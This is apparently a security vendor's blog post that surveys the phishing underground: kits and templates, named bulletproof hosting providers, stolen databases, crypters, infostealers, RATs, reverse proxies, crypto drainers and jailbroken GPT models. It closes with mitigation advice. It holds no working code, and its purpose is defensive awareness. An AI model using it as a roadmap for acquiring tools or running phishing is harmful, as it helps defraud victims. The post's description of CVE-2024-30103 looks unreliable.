Zero to Hero of Phishing: Modern Phishing Attacks by Leveraging Dark Web Tools and AI

bs-single-container

“An ounce of prevention is worth a pound of cure” holds true in the cybersecurity industry. There has never been a more accessible – or riskier – route from beginner to expert because of the widespread availability of phishing kits and dark web markets. Phishing attacks are based on easily accessible resources such as phishing kits and templates, allowing novice scripties to create convincing hoaxes. The dark web provides a robust marketplace for stolen data, which supports these attacks.

Novice to Expert: The Path

Phishing attacks frequently begin with novices using ready-made phishing kits designed to decrease the technical barrier to entry. These novices develop skills by using dark web markets to purchase more sophisticated tools. With access to advanced tools like FUD cryptos, reverse proxies, and RATs, these attackers improve their skills and eventually become expert-level threat actors capable of conducting intricate and meticulous operations.

The Foundation: Phishing Kits & Templates

Phishing kits are prepackaged tools that make it easier to start phishing attacks. These kits often include all the components attackers require to trick victims into disclosing sensitive information, such as deceptive login pages, scripts, and email templates.

Phising Templates in these kits are pre-designed websites or emails that look real, making it easy for attackers to conduct phishing attacks quickly and efficiently, even with limited technical expertise.

With the rise in AI and easy access to dark web forums and marketplaces, it has become easy for novice scripties to interact with expert threat actors and learn or buy toolkits to advance in becoming a reputed threat actor, thus significantly lowering the barrier to entry for malicious activities.

Various Darkweb forum advertisements

Below are famous forums and telegram channels selling or advertising phishing kits or templates. These are mentioned for research purposes only.

Setting the Stage: Hosting Providers on Marketplaces

Hosting and server providers are critical enablers of phishing attacks, providing infrastructure for fraudulent activities such as hosting fraudulent websites, sending phishing emails, and managing malware via C2 servers. Attackers use both genuine and illicit bulletproof hosting providers to remain anonymous, avoid discovery, and prolong their activities.

These services are accessible, affordable, and scalable, allowing even people with modest technological skills to conduct sophisticated phishing attacks. To prevent these dangers, cybersecurity specialists and hosting providers must collaborate more closely, improve detection, and tighten monitoring.

Bolster researchers have found some high-profile hosting and server providers in the cyber world, which was detected while analyzing multiple phishing and scam URLs. Some of them are listed below:

  1. Private Alps
  2. Alex Hosting
  3. EliteTeam
  4. FlyHosting
  5. FiberGrid
  6. Warez-Host
  7. Ultahost
  8. PSB-Hosting
  9. RDP.Monster
  10. Anon RDP
Various Darkweb forum advertisements

Fueling the Attack: Databases Available on Telegram and Dark Web

Databases available on Telegram and the Dark Web are essential tools for phishing attackers, giving them access to massive amounts of stolen personal and financial information. These databases, frequently offered at low costs, contain sensitive data such as email addresses, passwords, and credit card details, which are used to build tailored phishing operations.

Learn more about Telegram scams

PII and Database advertised

Enhancing Stealth

With the introduction of Fully Undetectable (FUD) tools and crypters, phishing assaults have become more sophisticated regarding stealth. These advanced techniques circumvent typical security measures, making malware and malicious payloads in phishing websites and kits invisible to antivirus software and detection systems.

Crypters, in particular, encrypt malicious code, allowing it to avoid signature-based detection while remaining functional when executed. This stealth capacity is critical for modern phishing tactics as it allows attackers to access systems undetected, steal valuable information, and retain persistence while remaining under the radar of cybersecurity defenses.

Crypters and FUD on sale

Expanding the Toolkit

InfoStealer

These malicious programs attempt to obtain sensitive information from infected devices, such as login credentials, credit card numbers, and other personal data. Infostealers are frequently used with phishing efforts to increase the data collected from victims.

RATs

RATs give attackers illegal access to a victim’s device, enabling them to manipulate it remotely. Once inside, the attacker can exfiltrate data, install other malware, or use the victim’s device as a launchpad for future attacks. RATs are an effective tool in a phishing attacker’s arsenal, allowing attackers to maintain persistent access to infected systems.

Reverse Proxies

Attackers employ reverse proxies to intercept and modify traffic between users and genuine websites. When used in phishing attacks, reverse proxies can collect login credentials or defeat multi-factor authentication (MFA) by posing as a go-between for the victim and the legitimate website.

Drainers

Drainers are tools built exclusively for emptying cryptocurrency wallets. As the popularity of cryptocurrencies grew, so did the creation of specialized tools for stealing digital assets. Drainers are frequently disseminated through phishing emails or fraudulent websites, luring users to disclose their wallet credentials or send funds to the attacker’s address.

Drainer collecting PII details for brand OPENSEA

The AI Revolution: Malicious Use of AI and GPT Models

Cybercriminals use AI to automate and improve phishing attempts, resulting in more convincing and sophisticated schemes. AI-powered models can create convincing emails, mirror known contacts’ writing styles, and even engage in real-time discussions to deceive victims into disclosing sensitive data.

GPT models, for instance, are being used to create highly tailored phishing messages, rendering standard detection systems ineffective.

Malicious version of GPT
Side by Side comparison of response received by GPT and jailbreak/malicious GPT

Exploiting Vulnerabilities: The Rise of Zero-Click Attacks

Zero-click attacks are swiftly becoming one of the most significant cybersecurity threats. Unlike typical phishing tactics, these attacks exploit system vulnerabilities without requiring user involvement, allowing attackers to easily infiltrate devices.

Once a vulnerability is exploited, attackers can access a device, install malware, and steal sensitive data without requiring the victim to click a link or open an attachment. The stealthiness of these attacks makes detection and prevention extremely difficult.

A notable example is the CVE-2024-30103 vulnerability, which demonstrates the increased risk posed by zero-click threats. This vulnerability affects major messaging apps, allowing attackers to take over devices by sending specially crafted messages. Because of a vulnerability in how communications are processed, the victim’s device can be compromised as soon as the message is received, with no user intervention required.

Mitigation Strategies

  • Security awareness training is provided regularly to educate users/employees/clients.
  • Use modern threat detection tools employing AI and advanced machine learning to understand incoming threats and flag them at an early stage before user involvement.
  • Use MFA and biometric verification.
  • Never respond to or give out sensitive credentials to emails, links, phone calls, or messages you may receive. Always keep an eye out when visiting such websites or social media profiles.
  • Use a zero-trust architecture for continuous verification.
  • Software updates and patching of servers and loopholes/vulnerabilities should be applied as soon as possible to address vulnerabilities.
  • Encrypt all communications and sensitive data.
  • Collaborate with hosting providers to take down phishing sites quickly.

Conclusion

Phishing is no longer limited to simple social engineering approaches; it has grown into a complex, multi-layered attack vector that employs dark web tools, AI, and undetectable malware. The availability of phishing kits and advanced cyber tools has made it easier than ever for scripties and novices to develop their capabilities.

To combat these risks, businesses and individuals must keep ahead of the curve by implementing proactive security measures, training, and ongoing monitoring. Only by remaining vigilant and proactive can we effectively protect against the constantly shifting terrain of cyberattacks.